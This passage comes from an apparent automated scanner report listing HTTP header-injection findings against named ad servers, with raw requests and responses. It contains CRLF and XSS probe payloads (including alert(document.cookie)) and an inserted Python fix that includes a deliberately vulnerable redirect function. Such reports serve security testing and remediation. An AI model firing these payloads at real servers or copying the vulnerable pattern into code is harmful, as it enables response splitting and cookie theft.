GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=2947d%0d%0a05ef6ceb7f1&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ahnEZcdm5abw6yuoZbUjT4fqUDUD2sYQZdDZaWW5gcOxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRm7xqnMnbNZckbcJL08tom0uWyJjGe8Zdt6BlH3Zcgcsh0fhhxv3ZaQZcwFXZaO9JVcJ3us2ZdEZbqUeIufqjSpys4WJ0ZcM4mr6MsaUrZcq3FYXmmEoyQZaT2oCpbp7Sa9R3qwWor4D8Mm5YBhUPfTZcWiokxRZdyDL8ZbxJGTKqMF1iAxwbpb54Zai70umIZbgT65ppZbnyB7gIZbDyGW8UKFavkRTEsxqlZaN1iaCB0Zbhnt9bYsMbvK8Cj2qIwq36U2FZdw8PHnZcPIElM4thBbssoLyiUdc6BFUqKGbcRobHZaYNo3S33TtJsIZd6Q06nZbVJc7y70AYUTNgFPp8SXa9QKEca2elev3OL5Sto7v35jL0kb6Nb7QY5ZdtYgneZdZaZaD8HJZaR6KLvrtv4ZaELqBJ2vX8DOdb7w7mmWRbQmEagXeFqev4lPVrOVZaLFXg4cTZdsNZbIqRmbujXWMuINv8oDedPbFX08cibqIqDiZd4jLJfCGZcv44L9PUotwStRAMouuXZbJm3; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:30 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=2947d
05ef6ceb7f1
&dcp=zmm.50658498.&dcc=39942763.226884546
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.126. http://ad.afy11.net/ad [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The value of the c request parameter is copied into the Location response header. The payload 3690c%0d%0a1a9836ae15c was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!http://ad.doubleclick.net/jump/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=2803508621?3690c%0d%0a1a9836ae15c HTTP/1.1
Host: ad.afy11.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: f=AgECAAAAAAALqJELwX83TQyokQsDfjdN; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAxZEByjtDTQAAAAAAAAAAAAAAAAAAAADUO0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; a=AZ7s9B85IkyRNDgbVDU-vg;

Response

HTTP/1.0 302 Moved Temporarily
Connection: close
Server: AdifyServer
Location: http://ad.doubleclick.net/jump/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=2803508621?3690c
1a9836ae15c

P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"


3.127. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://au.track.decideinteractive.com
Path:   /n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c

Issue detail

The value of REST URL parameter 4 is copied into the location response header. The payload 1257a%0d%0a5c54a5c22bc was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /n/13465/13553/1257a%0d%0a5c54a5c22bc/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c HTTP/1.1
Host: au.track.decideinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 14:12:05 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Fri, 28 Jan 2011 14:12:05 GMT
location: http://1257a
5c54a5c22bc

Set-Cookie: id=9272912264552253015; expires=Sat, 28-Jan-2012 14:12:05 GMT; path=/; domain=.decideinteractive.com;
Set-Cookie: name=9272912264602585191; path=/; domain=.decideinteractive.com;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


3.128. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload b1baf%0d%0a7abf175386a was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0b1baf%0d%0a7abf175386a; B3=89PS000000000GsZ7lgH0000000001sG89PT000000000RsZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abLU07l00000Rh5iUabLQ07l00000Gf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; C4=; u3=1;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0b1baf
7abf175386a
; expires=Fri, 29-Apr-2011 00: 23:03 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 29-Apr-2011 00:23:03 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 05:23:03 GMT
Connection: close
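
The server-side fix, as an added example rather than code from the report or from any of the ad servers it lists: `vulnerable_redirect` reproduces what 3.116 through 3.127 show (a once-decoded request value interpolated into `Location` with no check), `safe_redirect` re-encodes the target so the CRLF stays inside the header value, and `safe_set_cookie` applies the RFC 6265 cookie-octet rule that would have stopped 3.128 (a request cookie echoed back into `Set-Cookie`). Function names, the `(name, value)` header list and the response framing are assumptions made for the illustration.

```python
"""Emit redirect and cookie headers without letting CR/LF through.

Added example, not code from the crawler report or from any of the
ad servers it lists. Function names, the (name, value) header list and
the response framing are assumptions made for the illustration.
"""
from __future__ import annotations

from urllib.parse import quote

# CR, LF and NUL are never legal inside a header name or value.
_FORBIDDEN = frozenset("\r\n\x00")


class HeaderInjection(ValueError):
    """Raised instead of emitting a header that would split the response."""


def check_header_value(name: str, value: str) -> str:
    if _FORBIDDEN.intersection(name) or _FORBIDDEN.intersection(value):
        raise HeaderInjection(f"control character in header {name!r}")
    return value


def render(status: str, headers: list[tuple[str, str]], body: bytes = b"") -> bytes:
    """Serialise a response. Every value passes check_header_value, so a
    CRLF the caller failed to strip is refused rather than written out."""
    lines = [f"HTTP/1.1 {status}"]
    for name, value in headers:
        lines.append(f"{name}: {check_header_value(name, value)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


def vulnerable_redirect(target: str) -> bytes:
    """Server-side view of 3.116-3.127: the once-decoded request value is
    interpolated into Location with no check. Deliberately vulnerable;
    it bypasses render() on purpose."""
    head = f"HTTP/1.1 302 Moved Temporarily\r\nLocation: {target}\r\nContent-Length: 0\r\n\r\n"
    return head.encode("latin-1")


# RFC 3986 reserved characters plus '%' and '~', so an already-encoded
# URL passes through untouched while CR/LF become %0D%0A.
_URL_SAFE = "/:?#[]@!$&'()*+,;=%~"


def encode_redirect_target(target: str) -> str:
    """Percent-encode anything outside the URL character set. Assumes
    'target' is the parameter as decoded once by the server, which is
    how the ad servers above received the %0d%0a payload."""
    return quote(target, safe=_URL_SAFE)


def safe_redirect(target: str) -> bytes:
    return render("302 Found", [
        ("Location", encode_redirect_target(target)),
        ("Content-Length", "0"),
    ])


def _is_cookie_octet(c: str) -> bool:
    # RFC 6265 cookie-octet: printable ASCII minus space, DQUOTE, comma,
    # semicolon and backslash.
    return 0x21 <= ord(c) <= 0x7E and c not in '",;\\'


def safe_set_cookie(name: str, value: str, **attrs: str) -> str:
    """Build a Set-Cookie value, refusing anything outside cookie-octet.
    3.128-3.133 echo a request cookie or parameter straight into
    Set-Cookie; this check is where that reflection would have stopped."""
    if not name or "=" in name or not all(map(_is_cookie_octet, name + value)):
        raise HeaderInjection("illegal character in cookie name or value")
    parts = [f"{name}={value}"]
    for attr, attr_value in attrs.items():
        if ";" in attr or ";" in attr_value:
            raise HeaderInjection("';' in cookie attribute")
        check_header_value(attr, attr_value)
        parts.append(f"{attr}={attr_value}" if attr_value else attr)
    return "; ".join(parts)


def rejects(fn, *args, **kwargs) -> bool:
    """True if the call is refused with HeaderInjection (used in checks)."""
    try:
        fn(*args, **kwargs)
    except HeaderInjection:
        return True
    return False


if __name__ == "__main__":
    payload = "?26972\r\n53a2f8f14bb=1"  # decoded form of the 3.116 payload
    print(vulnerable_redirect(payload))  # Location split across two lines
    print(safe_redirect(payload))        # CRLF re-encoded inside Location
    print(rejects(safe_set_cookie, "eyeblaster", "WMPV=0b1baf\r\n7abf175386a"))
```

Two choices are worth stating. Encoding is used for `Location` because a redirect target is a URL and percent-encoding has a defined meaning there; for cookie values there is no such escape, so the only safe move is to refuse the value. Both paths also sit behind `render`, which rejects CR/LF in any header regardless of how it was built, so a new code path that forgets to encode fails closed instead of reproducing the findings above. The encoder assumes its input has been decoded exactly once; feeding it a still-encoded URL keeps `%0d%0a` as literal text, which is harmless, but feeding it a value decoded twice is what the ad-server bugs above amount to.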


3.129. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the bwVal request parameter is copied into the Set-Cookie response header. The payload 3a3a9%0d%0a04e21258072 was submitted in the bwVal parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4189023~~0~~~^ebAdDuration~398~0~01020^Panel1_duration~10~0~01001^Panel1_autoshow~0~0~01001&OptOut=0&ebRandom=0.05569868558086455&flv=10.1103&wmpv=0&res=128&bwVal=3a3a9%0d%0a04e21258072&bwTime=1296236256165 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Origin: http://www.cbs6albany.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=34e2bb94-b226-4e3e-b664-3ef3ef3ffc003Gq060; expires=Thu, 28-Apr-2011 20:57:32 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=3a3a9
04e21258072
&BWDate=40571.873287&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 28-Apr-2011 20: 57:32 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 01:57:31 GMT
Connection: close
Content-Length: 0


3.130. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 57ca0%0d%0a51ce047d9a0 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1891435&PluID=0&w=728&h=90&ord=2784774291777236223&ucm=true&ncu=http://r.turn.com/r/formclick/id/_6wFyXaBpSZSDgIAZwABAA/url/ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=057ca0%0d%0a51ce047d9a0; A3=gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=057ca0
51ce047d9a0
; expires=Thu, 28-Apr-2011 20: 57:33 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=f+JvabM902WG00001gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Thu, 28-Apr-2011 20:57:33 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS7dNH0000000001sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Thu, 28-Apr-2011 20:57:33 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 28-Apr-2011 20:57:33 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 01:57:32 GMT
Connection: close
Content-Length: 3021

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

3.131. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 3d56a%0d%0a2e04529cfa5 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4189023~~0~~~^ebAdDuration~398~0~01020^Panel1_duration~10~0~01001^Panel1_autoshow~0~0~01001&OptOut=0&ebRandom=0.05569868558086455&flv=3d56a%0d%0a2e04529cfa5&wmpv=0&res=128&bwVal=2030&bwTime=1296236256165 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Origin: http://www.cbs6albany.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=cb071012-5f18-494e-9aae-163a1c96cedc3Gq030; expires=Thu, 28-Apr-2011 20:57:32 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=2030&BWDate=40571.873287&debuglevel=&FLV=3d56a
2e04529cfa5
&RES=128&WMPV=0; expires=Thu, 28-Apr-2011 20: 57:32 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 01:57:31 GMT
Connection: close
Content-Length: 0


3.132. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload fee85%0d%0a8acf345c028 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4189023~~0~~~^ebAdDuration~398~0~01020^Panel1_duration~10~0~01001^Panel1_autoshow~0~0~01001&OptOut=0&ebRandom=0.05569868558086455&flv=10.1103&wmpv=0&res=fee85%0d%0a8acf345c028&bwVal=2030&bwTime=1296236256165 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Origin: http://www.cbs6albany.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=03177a3f-cd65-40a8-b9c3-8c6208fd089a3Gq040; expires=Thu, 28-Apr-2011 20:57:32 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=2030&BWDate=40571.873287&debuglevel=&FLV=10.1103&RES=fee85
8acf345c028
&WMPV=0; expires=Thu, 28-Apr-2011 20:57:32 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 01:57:31 GMT
Connection: close
Content-Length: 0


3.133. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 4d23d%0d%0ab83ab2cdd72 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4189023~~0~~~^ebAdDuration~398~0~01020^Panel1_duration~10~0~01001^Panel1_autoshow~0~0~01001&OptOut=0&ebRandom=0.05569868558086455&flv=10.1103&wmpv=4d23d%0d%0ab83ab2cdd72&res=128&bwVal=2030&bwTime=1296236256165 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Origin: http://www.cbs6albany.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=200545f6-3e94-416a-bea3-08b81f3152ff3Gq050; expires=Thu, 28-Apr-2011 20:57:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=2030&BWDate=40571.873275&debuglevel=&FLV=10.1103&RES=128&WMPV=4d23d
b83ab2cdd72
; expires=Thu, 28-Apr-2011 20:57:31 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 01:57:31 GMT
Connection: close
Content-Length: 0


3.134. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload b50db%0d%0a33e663e7a7e was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=b50db%0d%0a33e663e7a7e&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:b50db
33e663e7a7e
;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=43
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:07 GMT
Connection: close
Content-Length: 1914

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat=',b50db

...[SNIP]...

3.135. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 9bc45%0d%0ad1fca8116ea was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=9bc45%0d%0ad1fca8116ea&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
